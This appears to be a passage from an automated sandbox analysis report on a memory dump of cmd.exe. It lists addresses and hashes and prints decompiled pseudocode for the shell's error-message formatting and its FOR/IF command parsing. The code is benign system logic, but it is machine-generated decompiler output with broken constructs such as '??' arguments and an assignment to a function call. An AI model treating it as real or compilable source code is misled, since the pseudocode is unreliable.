                                    0x011f0d4a
                                    0x011f0f58
                                    0x00000000
                                    0x011f0f58
                                    0x011f0d50
                                    0x011f0d53
                                    0x00000000
                                    0x011f0d59
                                    0x011f0d59
                                    0x011f0d5c
                                    0x011f0d6d
                                    0x011f0d72
                                    0x011f0d72
                                    0x00000000
                                    0x011f0d5c
                                    0x011f0d53
                                    0x011f0eee
                                    0x011f0ef1
                                    0x00000000
                                    0x00000000
                                    0x011f0ef3
                                    0x011f0ef8
                                    0x011f0efd
                                    0x011f0f06
                                    0x011f0f0b
                                    0x011f0f14
                                    0x011f0f19
                                    0x00000000
                                    0x00000000
                                    0x011f0f1b
                                    0x011f0f20
                                    0x011f0f28
                                    0x00000000
                                    0x011f0f28
                                    0x011f0f0d
                                    0x00000000
                                    0x011f0f0d
                                    0x011f0eff
                                    0x00000000
                                    0x011f0eff
                                    0x011d9856
                                    0x011d9860
                                    0x011d9860
                                    0x011d9862
                                    0x00000000
                                    0x011f0cf2
                                    0x011f0cf2
                                    0x011f0cf5
                                    0x011f0e18
                                    0x011f0e1d
                                    0x011f0e24
                                    0x011f0e75
                                    0x011f0e82
                                    0x011f0e92
                                    0x011f0ea1
                                    0x011f0eb2
                                    0x011f0ec4
                                    0x011f0ec9
                                    0x00000000
                                    0x011f0ec9
                                    0x011f0e26
                                    0x011f0e29
                                    0x011f0e2b
                                    0x011f0e35
                                    0x011f0e37
                                    0x011f0e41
                                    0x011f0e43
                                    0x011f0e4d
                                    0x011f0e4f
                                    0x00000000
                                    0x00000000
                                    0x011f0e51
                                    0x011f0e52
                                    0x011f0e57
                                    0x011f0e5c
                                    0x011f0e61
                                    0x011f0e65
                                    0x00000000
                                    0x00000000
                                    0x011f0e67
                                    0x011f0e68
                                    0x00000000
                                    0x011f0e68
                                    0x011f0e45
                                    0x011f0e46
                                    0x00000000
                                    0x011f0e46
                                    0x011f0e39
                                    0x011f0e3a
                                    0x00000000
                                    0x011f0e2d
                                    0x011f0e2d
                                    0x011f0e2e
                                    0x011f0e6b
                                    0x011f0e70
                                    0x00000000
                                    0x011f0e70
                                    0x011f0e2b
                                    0x011f0cfb
                                    0x011f0cfe
                                    0x011f0d8a
                                    0x011f0d8f
                                    0x011f0d92
                                    0x011f0d94
                                    0x011f0d97
                                    0x011f0dad
                                    0x011f0db0
                                    0x011f0db4
                                    0x011f0db7
                                    0x011f0db9
                                    0x011f0db9
                                    0x011f0d99
                                    0x011f0da1
                                    0x011f0da5
                                    0x011f0da5
                                    0x011f0dbe
                                    0x011f0dc0
                                    0x011f0dc9
                                    0x011f0dce
                                    0x011f0dce
                                    0x011f0dd8
                                    0x011f0de5
                                    0x011f0dea
                                    0x011f0dee
                                    0x00000000
                                    0x011f0df4
                                    0x011f0dfd
                                    0x011f0e02
                                    0x00000000
                                    0x011f0e02
                                    0x011f0dee
                                    0x011f0d00
                                    0x011f0d03
                                    0x00000000
                                    0x00000000
                                    0x011f0d09
                                    0x00000000
                                    0x00000000
                                    0x011f0d0f
                                    0x011f0d12
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011f0d12

                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: == $EQU $FOR$FOR /?$GEQ $GTR $IF /?$LEQ $LSS $NEQ $REM /?
                                    • API String ID: 0-366822981
                                    • Opcode ID: d26f97cd77313ef046d4caf09eb9d126965ad5cbf551f48b37454695618812c5
                                    • Instruction ID: 8f9ec51c66f5d6d6b25f9777ae3baf61cdc8b94a15efac45ad00c52a029cece2
                                    • Opcode Fuzzy Hash: d26f97cd77313ef046d4caf09eb9d126965ad5cbf551f48b37454695618812c5
                                    • Instruction Fuzzy Hash: ADA1E1B070020EFBDF2CDE59C98596E7B27FB88698B10811DF6069B252C7719D91CB83
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011DC6F4, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 147windowCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 41%
                                    			E011DC6F4(long __ecx, intOrPtr _a4, void* _a8) {
				signed int _v8;
				char _v40;
				short _v104;
				void* _v108;
				long _v112;
				char* _v116;
				char _v120;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t22;
				signed int _t26;
				char* _t31;
				void* _t37;
				char* _t45;
				intOrPtr _t48;
				WCHAR* _t55;
				void* _t56;
				signed int _t57;
				signed int _t59;
				long _t60;
				void* _t61;
				int _t62;
				signed int _t63;

				_t22 =  *0x11fd0b4; // 0x2833377e
				_v8 = _t22 ^ _t63;
				_t47 = _a8;
				_t60 = __ecx;
				_v108 = _a8;
				_t62 = 0;
				_v112 = __ecx;
				if(__ecx == 0x13d || FormatMessageW(0x1a00, 0, __ecx, 0, 0x120b980, 0x2000, 0) == 0) {
					__imp___ultoa(_t60,  &_v40, 0x10);
					_t26 = E011E0638(GetACP());
					asm("sbb eax, eax");
					MultiByteToWideChar(_t62,  ~( ~_t26),  &_v40, 0xffffffff,  &_v104, 0x20);
					_v120 =  &_v104;
					_t31 = L"Application";
					if(_t60 < 0x2328) {
						_t31 = L"System";
					}
					_v116 = _t31;
					_push( &_v120);
					_push(0x2000);
					_push(0x120b980);
					_push(_t62);
					_push(0x13d);
					_push(_t62);
					_push(0x3000);
					goto L6;
				} else {
					_t55 = 0x120b980;
					_t48 = 0x25;
					while(1) {
						_t58 = _t48;
						_t37 = E011DD7D4(_t55, _t48);
						_t56 = _t37;
						if(_t56 == 0) {
							break;
						}
						_t55 = _t56 + 2;
						_t59 =  *_t55 & 0x0000ffff;
						if(_t59 - 0x31 > 8) {
							if(_t59 == _t48) {
								_t55 =  &(_t55[1]);
							}
						} else {
							_t62 = _t62 + 1;
						}
					}
					_t47 = _v108;
					if(_t62 > _a4) {
						_t47 = HeapAlloc(GetProcessHeap(), 0, _t62 << 2);
						if(_t47 == 0) {
							L8:
							return E011E6FD0(_t34, _t47, _v8 ^ _t63, _t58, _t60, _t62);
						}
						_t57 = 0;
						if(_t62 == 0) {
							L21:
							_t62 = FormatMessageW(0x3800, 0, _t60, 0, 0x120b980, 0x2000, _t47);
							RtlFreeHeap(GetProcessHeap(), 0, _t47);
							L7:
							_t34 = _t62;
							goto L8;
						}
						_t61 = _v108;
						_t58 = _a4;
						do {
							if(_t57 >= _t58) {
								_t45 = " ";
							} else {
								 *_t61 =  *_t61 + 4;
								_t45 =  *( *_t61 - 4);
							}
							 *(_t47 + _t57 * 4) = _t45;
							_t57 = _t57 + 1;
						} while (_t57 < _t62);
						_t60 = _v112;
						goto L21;
					}
					_push(_t47);
					_push(0x2000);
					_push(0x120b980);
					_push(_t37);
					_push(_t60);
					_push(_t37);
					_push(0x1800);
					L6:
					_t62 = FormatMessageW();
					goto L7;
				}
			}



























                                    0x011dc6fc
                                    0x011dc703
                                    0x011dc707
                                    0x011dc70c
                                    0x011dc70e
                                    0x011dc711
                                    0x011dc713
                                    0x011dc71c
                                    0x011eaf0e
                                    0x011eaf1f
                                    0x011eaf2e
                                    0x011eaf38
                                    0x011eaf41
                                    0x011eaf44
                                    0x011eaf4f
                                    0x011eaf51
                                    0x011eaf51
                                    0x011eaf56
                                    0x011eaf5c
                                    0x011eaf5d
                                    0x011eaf62
                                    0x011eaf67
                                    0x011eaf68
                                    0x011eaf6d
                                    0x011eaf6e
                                    0x00000000
                                    0x011dc743
                                    0x011dc745
                                    0x011dc74a
                                    0x011dc74b
                                    0x011dc74b
                                    0x011dc74d
                                    0x011dc752
                                    0x011dc756
                                    0x00000000
                                    0x00000000
                                    0x011dc794
                                    0x011dc797
                                    0x011dc7a1
                                    0x011eae7e
                                    0x011eae84
                                    0x011eae84
                                    0x011dc7a7
                                    0x011dc7a7
                                    0x011dc7a7
                                    0x011dc7a1
                                    0x011dc758
                                    0x011dc75e
                                    0x011eaea1
                                    0x011eaea5
                                    0x011dc781
                                    0x011dc791
                                    0x011dc791
                                    0x011eaeab
                                    0x011eaeaf
                                    0x011eaed5
                                    0x011eaef3
                                    0x011eaefc
                                    0x011dc77f
                                    0x011dc77f
                                    0x00000000
                                    0x011dc77f
                                    0x011eaeb1
                                    0x011eaeb4
                                    0x011eaeb7
                                    0x011eaeb9
                                    0x011eaec5
                                    0x011eaebb
                                    0x011eaebb
                                    0x011eaec0
                                    0x011eaec0
                                    0x011eaeca
                                    0x011eaecd
                                    0x011eaece
                                    0x011eaed2
                                    0x00000000
                                    0x011eaed2
                                    0x011dc764
                                    0x011dc765
                                    0x011dc76a
                                    0x011dc76f
                                    0x011dc770
                                    0x011dc771
                                    0x011dc772
                                    0x011dc777
                                    0x011dc77d
                                    0x00000000
                                    0x011dc77d

                                    APIs
                                    • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001A00,00000000,?,00000000,0120B980,00002000,00000000,00000000,?,00000000), ref: 011DC735
                                      • Part of subcall function 011DD7D4: wcschr.MSVCRT ref: 011DD7DA
                                    • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001800,00000000,?,00000000,0120B980,00002000,?), ref: 011DC777
                                    • _ultoa.MSVCRT ref: 011EAF0E
                                    • GetACP.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 011EAF17
                                    • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00000000,?,000000FF,?,00000020), ref: 011EAF38
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: FormatMessage$ByteCharMultiWide_ultoawcschr
                                    • String ID: Application$System
                                    • API String ID: 3538039442-3455788185
                                    • Opcode ID: e2487abe77ab89d349b284bd426415fbd0543afd3c5013dd0217b18ad43fc1a1
                                    • Instruction ID: 05dde94352ced63d082aad38fd2d9c5ee93768cc0259d28a3f910b6ea27cf815
                                    • Opcode Fuzzy Hash: e2487abe77ab89d349b284bd426415fbd0543afd3c5013dd0217b18ad43fc1a1
                                    • Instruction Fuzzy Hash: FF41E771B007196BDF289BA4DC5DFAEBBA8EB55711F110119F606EB1C0DB709D40CB91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E04A0, Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 110COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 55%
                                    			E011E04A0(signed int __eax, void* __ebx, void* __edx, void* __edi) {
				signed int _v4;
				WCHAR* _v8;
				long* _v12;
				long _v16;
				WCHAR* _v20;
				WCHAR* _v24;
				char _v544;
				WCHAR* _v548;
				WCHAR* _v552;
				WCHAR* __esi;
				signed int _t106;
				short _t107;
				void* _t112;
				signed int _t115;
				void* _t117;
				WCHAR** _t119;
				short _t120;
				signed int _t124;
				signed short* _t125;
				WCHAR* _t129;

				_t117 = __ebx;
				_t106 = __eax;
				if( *0x120fa90 != 0x4000) {
					_t107 =  *0x120faa0;
					__eflags = _t107 - 0x28;
					if(_t107 != 0x28) {
						__eflags = _t107 - 0x40;
						if(_t107 == 0x40) {
							goto L140;
						} else {
							goto L150;
						}
					} else {
						L140:
						_t119 = 0x50;
						_t129 = E011E00B0(0x50);
						__eflags = _t129;
						if(_t129 == 0) {
							E011F9287(0x50);
							__imp__longjmp(0x120b8b8, 1);
							asm("int3");
							_t106 =  *0x50 & 0x0000ffff;
							_t124 = _t106;
							__eflags = _t106;
							if(_t106 != 0) {
								_t106 = 0;
								__eflags = 0;
								do {
									_t125 = _t119;
									_t119 = _t119 + _t129;
									__eflags =  *_t119;
								} while ( *_t119 != 0);
								_t124 =  *_t125 & 0x0000ffff;
							}
							__eflags = _t124 - 0x3a;
							if(_t124 != 0x3a) {
								 *0x11fd55c = 3;
							}
							return _t106;
						} else {
							__eflags =  *0x120faa0 - 0x28;
							if( *0x120faa0 != 0x28) {
								 *_t129 = 0x3b;
								_t120 = 0;
							} else {
								 *_t129 = 0x33;
								do {
									_t115 = E011DF030(0x10);
									__eflags =  *0x120faa0 - 0xa;
								} while ( *0x120faa0 == 0xa);
								__eflags = 0;
								E011DF300(_t115, 0, 0, 0);
								_t120 = 0x33;
							}
							_t129[0x1c] = E011DDC74(_t117, _t120);
							__eflags =  *_t129 - 0x3b;
							if( *_t129 == 0x3b) {
								L147:
								return _t129;
							} else {
								_t112 = E011DF030(0x10);
								__eflags = _t112 - 0x29;
								if(_t112 != 0x29) {
									L150:
									E011F82EB(0x10);
									__eflags = 0;
									return 0;
								} else {
									goto L147;
								}
							}
						}
					}
				} else {
					__imp___wcsicmp(L"FOR", 0x120faa0);
					__esp = __esp + 8;
					__eflags = __eax;
					if(__eax == 0) {
						L152:
						_pop(__esi);
						__edi = 0;
						__imp___wcsicmp(L"FOR/?", __edi, __esi);
						_pop(__ecx);
						__ecx = 0x120faa0;
						__eflags = __eax;
						if(__eflags == 0) {
							__eax = 0;
							__edi = 0;
							 *0x120faa6 = __ax;
							__edi = 1;
						}
						__ecx = 0x2b;
						 *0x120fa8c = 0x1e;
						__esi = E011DE9A0(__ecx, __eflags);
						__eax = 0x2f;
						__eflags = __edi;
						if(__edi != 0) {
							 *0x120faa0 = __ax;
							__eax = 0x3f;
							 *0x120faa2 = __ax;
							__eax = 0;
							 *0x120faa4 = __ax;
						} else {
							__ecx = 0;
							__eflags = 0;
							__eax = E011DF030(0);
						}
						__edx = 0x2b;
						__eax = E011DDCE1(__ebx, __edx, __edi);
						__eflags = __al;
						if(__al != 0) {
							__esi[0x1c] = __esi[0x1c] & 0x00000000;
							 *__esi = 0x3c;
						} else {
							__esi[0x24] = __esi[0x24] & 0x00000000;
							__eflags =  *0x1213cc9;
							__eax = 0x25;
							if( *0x1213cc9 != 0) {
								__edi = 0;
								__edi = 1;
								__eflags = 1;
								while(1) {
									__imp___wcsicmp(L"/L");
									_pop(__ecx);
									__ecx = 0x120faa0;
									__eflags = __eax;
									if(__eax == 0) {
										goto L32;
									}
									L9:
									__imp___wcsicmp(L"/D");
									_pop(__ecx);
									__ecx = 0x120faa0;
									__eflags = __eax;
									if(__eax == 0) {
										__esi[0x24] = __esi[0x24] | 0x00000002;
										L27:
										__ecx = 0;
										__eax = E011DF030(0);
										while(1) {
											__imp___wcsicmp(L"/L");
											_pop(__ecx);
											__ecx = 0x120faa0;
											__eflags = __eax;
											if(__eax == 0) {
												goto L32;
											}
											goto L9;
										}
										goto L32;
									}
									__imp___wcsicmp(L"/F");
									_pop(__ecx);
									__ecx = 0x120faa0;
									__eflags = __eax;
									if(__eax == 0) {
										__esi[0x24] = __esi[0x24] | 0x00000008;
										__ecx = 0;
										__eax = E011DF030(0);
										__ax =  *0x120faa0;
										__ecx = 0x25;
										__eflags = __ax - __cx;
										if(__ax == __cx) {
											continue;
										} else {
											__ecx = 0x2f;
											__eflags = __ax - __cx;
											if(__ax == __cx) {
												continue;
											} else {
												__eflags = __esi[0x26];
												if(__esi[0x26] != 0) {
													__eax = E011F82EB(__ecx);
												}
												__eax =  *0x120fa8c;
												__ecx = 6 +  *0x120fa8c * 2;
												__eax = E011E00B0(__ecx);
												__eflags = __eax;
												if(__eax == 0) {
													goto L212;
												} else {
													__edx =  *0x120fa8c;
													__edx =  &(( *0x120fa8c)[1]);
													goto L26;
												}
											}
										}
										goto L218;
									} else {
										__imp___wcsicmp(L"/R");
										_pop(__ecx);
										__ecx = 0x120faa0;
										__ecx = __esi[0x24];
										__eflags = __eax;
										if(__eax == 0) {
											__esi[0x24] = __ecx;
											__ecx = 0;
											__eax = E011DF030(0);
											__eflags = __esi[0x26];
											if(__esi[0x26] != 0) {
												__eax = E011F82EB(__ecx);
											}
											__ax =  *0x120faa0;
											__ecx = 0x25;
											__eflags = __ax - __cx;
											if(__ax == __cx) {
												continue;
											} else {
												__ecx = 0x2f;
												__eflags = __ax - __cx;
												if(__ax == __cx) {
													continue;
												} else {
													__eax =  *0x120fa8c;
													__ecx = 2 +  *0x120fa8c * 2;
													__eax = E011E00B0(__ecx);
													__eflags = __eax;
													if(__eax == 0) {
														L212:
														__eax = E011F9287(__ecx);
														__imp__longjmp(0x120b8b8, __edi);
														goto L213;
													} else {
														__edx =  *0x120fa8c;
														__edx =  &(( *0x120fa8c)[0]);
														L26:
														__ecx = __eax;
														__esi[0x26] = __eax;
														__eax = E011E1040(__eax, __edx, 0x120faa0);
														goto L27;
													}
												}
											}
											goto L218;
										} else {
											__eflags = __ecx;
											if(__ecx != 0) {
												__eflags = __ecx - 8;
												if(__ecx != 8) {
													__eflags = __ecx - 2;
													if(__ecx != 2) {
														__eflags = __ecx - __edi;
														if(__ecx != __edi) {
															L213:
															__eflags = __ecx - 6;
															if(__ecx != 6) {
																__eflags = __ecx - 4;
																if(__ecx != 4) {
																	__eax = E011F82EB(__ecx);
																}
															}
														}
													}
												}
											}
										}
									}
									__eax = 0x25;
									goto L15;
									L32:
									__esi[0x24] = __esi[0x24] | __edi;
									goto L27;
								}
							}
							L15:
							__eflags =  *0x120faa0 - __ax;
							if( *0x120faa0 != __ax) {
								L216:
								__eax = E011F82EB(__ecx);
							} else {
								__eax =  *0x120faa2 & 0x0000ffff;
								__eax = iswspace( *0x120faa2 & 0x0000ffff);
								_pop(__ecx);
								__eflags = __eax;
								if(__eax != 0) {
									goto L216;
								} else {
									__edx =  *0x120faa2 & 0x0000ffff;
									__ecx = L"=,;";
									__esi[0x22] = __edx;
									__eax = E011DD7D4(__ecx, __edx);
									__eflags = __eax;
									if(__eax != 0) {
										goto L216;
									} else {
										__eflags =  *0x120fa8c - 3;
										if( *0x120fa8c != 3) {
											goto L216;
										}
									}
								}
							}
							__ecx = __esi[0x1c];
							__edi = 0x120faa0;
							_push(0x120faa0);
							_push(__ecx);
							__edx = 0x1e;
							__eax = E011D9C73(__ecx, __edx);
							__ecx = L"IN";
							__eax = E011D9C4D(L"IN");
							__ecx = __esi[0x1c];
							_push(0x120faa0);
							_push(__ecx);
							__edx = 0x1e;
							__eax = E011D9C73(__ecx, __edx);
							__eax = E011D9936(__ebx);
							__ecx = L"DO";
							__esi[0x1e] = __eax;
							__eax = E011D9C4D(L"DO");
							__ecx = __esi[0x1c];
							_push(0x120faa0);
							__ecx = __esi[0x1c] + 0x2c;
							__edx = 8;
							__eax = E011E1040(__esi[0x1c] + 0x2c, __edx);
							__ecx = 0x2b;
							__eax = E011DDC74(__ebx, __ecx);
							__esi[0x20] = __eax;
							__eflags = __eax;
							if(__eax == 0) {
								__eax = E011F82EB(__ecx);
							}
						}
						_pop(__edi);
						__eax = __esi;
						_pop(__esi);
						return __esi;
					} else {
						__imp___wcsicmp(L"FOR/?", 0x120faa0);
						__esp = __esp + 8;
						__eflags = __eax;
						if(__eax == 0) {
							goto L152;
						} else {
							__imp___wcsicmp(L"IF", 0x120faa0);
							__esp = __esp + 8;
							__eflags = __eax;
							if(__eax == 0) {
								L148:
								_pop(__esi);
								__edi = 0;
								__imp___wcsicmp(L"IF/?", __edi, __esi, __ecx);
								_pop(__ecx);
								__ecx = 0x120faa0;
								__eflags = __eax;
								if(__eflags == 0) {
									__eax = 0;
									__edi = 0;
									 *0x120faa4 = __ax;
									__edi = 1;
								}
								__ecx = 0x2c;
								__esi = E011DE9A0(__ecx, __eflags);
								__eflags = __edi;
								if(__edi != 0) {
									__eax = 0x2f;
									 *0x120faa0 = __ax;
									__eax = 0x3f;
									 *0x120faa2 = __ax;
									__eax = 0;
									 *0x120faa4 = __ax;
								} else {
									__ecx = 0;
									__eflags = 0;
									__eax = E011DF030(0);
								}
								__edx = 0x2c;
								__eax = E011DDCE1(__ebx, __edx, __edi);
								__eflags = __al;
								if(__al != 0) {
									__esi[0x1c] = __esi[0x1c] & 0x00000000;
									 *__esi = 0x3c;
									goto L47;
								} else {
									__edi = 0;
									__eflags =  *0x1213cc9 - __al;
									if( *0x1213cc9 == __al) {
										L40:
										__edx = 0;
										__ecx = 0;
										__eflags = 0;
										__eax = E011DF300(__eax, 0, 0, 0);
									} else {
										__imp___wcsicmp(L"/I");
										__ecx = 0x120faa0;
										_pop(__ecx);
										__eflags = __eax;
										if(__eax == 0) {
											__edi = 0;
											__edi = 1;
										} else {
											goto L40;
										}
									}
									__ecx = 0;
									__eax = E011DCDA2(0);
									__esi[0x1e] = __eax;
									__eflags = __eax;
									if(__eax != 0) {
										__eflags = __edi;
										if(__edi != 0) {
											__eflags =  *__eax - 0x38;
											if( *__eax == 0x38) {
												__eax = __eax[0x1e];
											}
											__eax[0x20] = 2;
										}
									}
									__ecx = 0x2c;
									__eax = E011DDC74(__ebx, __ecx);
									__esi[0x20] = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E011F82EB(__ecx);
									}
									__eax = E011DEEC8();
									__eflags = __eax;
									if(__eax == 0) {
										L47:
										_pop(__edi);
										__eax = __esi;
										_pop(__esi);
										_pop(__ecx);
										return __esi;
									} else {
										__ecx = 0;
										__eax = E011DF030(0);
										__edi = 0x120faa0;
										__imp___wcsicmp(L"ELSE");
										_pop(__ecx);
										__ecx = 0x120faa0;
										__eflags = __eax;
										if(__eax == 0) {
											__eax =  *0x120fa8c;
											__ecx =  *0x120fa8c +  *0x120fa8c;
											__eax = E011E00B0(__ecx);
											__eflags = __eax;
											if(__eax == 0) {
												__eax = E011F9287(__ecx);
												__imp__longjmp(0x120b8b8, 1);
												asm("int3");
												while(1) {
													L165:
													__eax = 0;
													__edx[__ecx] = __ax;
													while(1) {
														__eax = __esi[0xa];
														__esi = __eax;
														__eflags = __eax;
														if(__eax == 0) {
															break;
														}
														__ecx = __esi[2];
														__edi = __ecx;
														__edx =  &(__edi[1]);
														do {
															__ax =  *__edi;
															__edi =  &(__edi[1]);
															__eflags = __ax - __bx;
														} while (__ax != __bx);
														__edi = __edi - __edx;
														__edi = __edi >> 1;
														__eax = E011E22C0(__ebx, __ecx);
														__ecx = __esi[2];
														__edx =  &(__edi[0]);
														__eax = E011E1040(__esi[2], __edx, __eax);
														__eflags = __esi[4] - __ebx;
														if(__esi[4] == __ebx) {
															__edx = __esi[2];
															__ecx = __edx;
															__edi =  &(__ecx[1]);
															do {
																__ax =  *__ecx;
																__ecx =  &(__ecx[1]);
																__eflags = __ax - __bx;
															} while (__ax != __bx);
															__ecx = __ecx - __edi;
															__ecx = __ecx >> 1;
															__ecx = __ecx - 1;
															__eflags = __ecx - 1;
															if(__ecx > 1) {
																__eflags = __edx[__ecx] - 0x3a;
																if(__edx[__ecx] == 0x3a) {
																	goto L165;
																}
															}
														}
													}
													__edi = _v552;
													__esi = _v548;
													__eflags = __esi - 3;
													if(__esi == 3) {
														__eax =  *0x1213cd4;
														_v552 = __eax;
														goto L67;
													} else {
														__ecx = 0x10;
														__eax = E011E00B0(__ecx);
														_v552 = __eax;
														__eflags = __eax;
														if(__eax == 0) {
															L86:
															__ebx = 0;
															__ebx = 1;
														} else {
															__ecx =  *0x1213cd4;
															__eax[6] =  *0x1213cd4;
															 *0x1213cd4 = __eax;
															__eax[4] = __edi;
															 *__eax = __esi;
															L67:
															__edi = __edi[0x1a];
															__eflags = __edi;
															if(__edi != 0) {
																__esi = __esi | 0xffffffff;
																__eflags = __esi;
																do {
																	__eflags = __edi[4] - __ebx;
																	if(__edi[4] != __ebx) {
																		goto L82;
																	} else {
																		__imp___get_osfhandle( *__edi);
																		_pop(__ecx);
																		__eflags = __eax - __esi;
																		if(__eax == __esi) {
																			L170:
																			__edi[4] = __esi;
																			goto L75;
																		} else {
																			__imp___get_osfhandle( *__edi);
																			_pop(__ecx);
																			__eflags = __eax - 0xfffffffe;
																			if(__eax == 0xfffffffe) {
																				goto L170;
																			} else {
																				__ecx =  *__edi;
																				__eax = E011E0178(__eax);
																				__eflags = __eax;
																				if(__eax == 0) {
																					__ecx =  *__edi;
																					__eax = E011F9953(__eax,  *__edi);
																					__eflags = __eax;
																					if(__eax != 0) {
																						goto L73;
																					} else {
																						__imp___get_osfhandle( *__edi, __ebx, __ebx, 1);
																						_pop(__ecx);
																						__eax = SetFilePointer(__eax, ??, ??, ??);
																						__eflags = __eax - __esi;
																						if(__eax != __esi) {
																							goto L73;
																						} else {
																							__esi = 0x1213d00;
																							__eax = E011E274C(0x1213d00, 0x104, L"%d",  *__edi);
																							_push(0x1213d00);
																							_push(1);
																							_push(0x40002721);
																							goto L182;
																						}
																					}
																				} else {
																					L73:
																					__ecx =  *__edi;
																					__eax = E011DDBCE(__eax,  *__edi);
																					__edi[4] = __eax;
																					__eflags = __eax - __esi;
																					if(__eax == __esi) {
																						__esi = 0x1213d00;
																						__eax = E011E274C(0x1213d00, 0x104, L"%d",  *__edi);
																						_push(0x1213d00);
																						_push(1);
																						_push(0x2344);
																						L182:
																						__eax = E011DC5A2(__ecx);
																						__esp = __esp + 0x1c;
																						__edi[4] = __ebx;
																						__eax = E011DD937();
																						goto L86;
																					} else {
																						__ecx =  *__edi;
																						__eax = E011DDB92( *__edi);
																						L75:
																						__ecx = __edi[2];
																						__eflags =  *__ecx - 0x26;
																						if( *__ecx == 0x26) {
																							__eax = 0;
																							__ecx[2] = __ax;
																							__eax = __edi[2];
																							__edx =  *__edi;
																							__ecx = __eax[1] & 0x0000ffff;
																							__ecx = (__eax[1] & 0x0000ffff) - 0x30;
																							__eax = E011DDBFC((__eax[1] & 0x0000ffff) - 0x30, __edx);
																							__eflags = __eax - __esi;
																							if(__eax != __esi) {
																								goto L82;
																							} else {
																								goto L183;
																							}
																						} else {
																							__eflags = __edi[8] - 0x3c;
																							_push(__ecx);
																							if(__edi[8] == 0x3c) {
																								__edx = 0x8000;
																								__eax = E011DD120(__ecx, 0x8000);
																								_v548 = __eax;
																								__eflags = __eax - __esi;
																								if(__eax != __esi) {
																									goto L79;
																								} else {
																									__ecx = L"DPATH";
																									__eax = E011E3320(L"DPATH");
																									__eflags = __eax;
																									if(__eax == 0) {
																										goto L184;
																									} else {
																										__ecx = _v24;
																										__eflags = __ecx;
																										if(__ecx == 0) {
																											__ecx =  &_v544;
																										}
																										__eax = SearchPathW(__eax, __edi[2], __ebx, _v16, __ecx, __ebx);
																										__eflags = __eax;
																										if(__eax == 0) {
																											goto L184;
																										} else {
																											__ecx = _v24;
																											__eflags = __ecx;
																											if(__ecx == 0) {
																												__ecx =  &_v544;
																											}
																											_push(__ecx);
																											__edx = 0x8000;
																											goto L78;
																										}
																									}
																								}
																							} else {
																								__edi[6] =  ~(__edi[6]);
																								asm("sbb edx, edx");
																								__edx =  ~(__edi[6]) & 0xfffffe09;
																								__edx = ( ~(__edi[6]) & 0xfffffe09) + 0x301;
																								__eflags = __edx;
																								L78:
																								__eax = E011DD120(__ecx, __edx);
																								_v548 = __eax;
																								__eflags = __eax - __esi;
																								if(__eax == __esi) {
																									L184:
																									__eax = E011DD937();
																									__ecx =  *0x1213cf0;
																									__eax = E011F985A( *0x1213cf0);
																									goto L86;
																								} else {
																									L79:
																									__eflags = __eax -  *__edi;
																									if(__eax !=  *__edi) {
																										__edx =  *__edi;
																										__ecx = __eax;
																										__eax = E011DDBFC(__eax,  *__edi);
																										__ecx = _v548;
																										__esi = __eax;
																										__eax = E011DDB92(_v548);
																										__eflags = __esi - 0xffffffff;
																										if(__esi == 0xffffffff) {
																											L183:
																											__eax = E011DD937();
																											__esi = 0x1213d00;
																											E011E274C(0x1213d00, 0x104, L"%d",  *__edi) = E011DC5A2(__ecx, 0x2344, 1, 0x1213d00);
																											goto L86;
																										} else {
																											__eax =  *__edi;
																											__esi = __esi | 0xffffffff;
																											goto L80;
																										}
																									} else {
																										L80:
																										__eflags = __eax - __esi;
																										if(__eax == __esi) {
																											goto L184;
																										} else {
																											__ecx = _v552;
																											_v552[2] = __eax;
																											goto L82;
																										}
																									}
																								}
																							}
																						}
																					}
																				}
																			}
																		}
																	}
																	goto L83;
																	L82:
																	__eax = __edi[0xa];
																	__edi = __eax;
																	__eflags = __eax;
																} while (__eax != 0);
															}
														}
													}
													L83:
													__imp__??_V@YAXPAX@Z(_v24);
													_pop(__ecx);
													__ecx = _v4;
													__eax = __ebx;
													_pop(__edi);
													_pop(__esi);
													__ecx = _v4 ^ __ebp;
													__eflags = __ecx;
													_pop(__ebx);
													__eax = E011E6FD0(__ebx, __ebx, __ecx, __edx, __edi, __esi);
													__esp = __ebp;
													_pop(__ebp);
													return __eax;
													goto L218;
												}
											} else {
												__edx =  *0x120fa8c;
												__ecx = __eax;
												__esi[0x22] = __eax;
												__eax = E011E1040(__eax,  *0x120fa8c, 0x120faa0);
												__ecx = 0x2c;
												__eax = E011DDC74(__ebx, __ecx);
												__esi[0x24] = __eax;
												__eflags = __eax;
												if(__eax == 0) {
													__eax = E011F82EB(__ecx);
												}
												goto L47;
											}
										} else {
											__edx = 0;
											__ecx = 0;
											__eflags = 0;
											__eax = E011DF300(__eax, 0, 0, 0);
											goto L47;
										}
									}
								}
							} else {
								__imp___wcsicmp(L"IF/?", 0x120faa0);
								__esp = __esp + 8;
								__eflags = __eax;
								if(__eax == 0) {
									goto L148;
								} else {
									__imp___wcsicmp(L"REM", 0x120faa0);
									__esp = __esp + 8;
									__eflags = __eax;
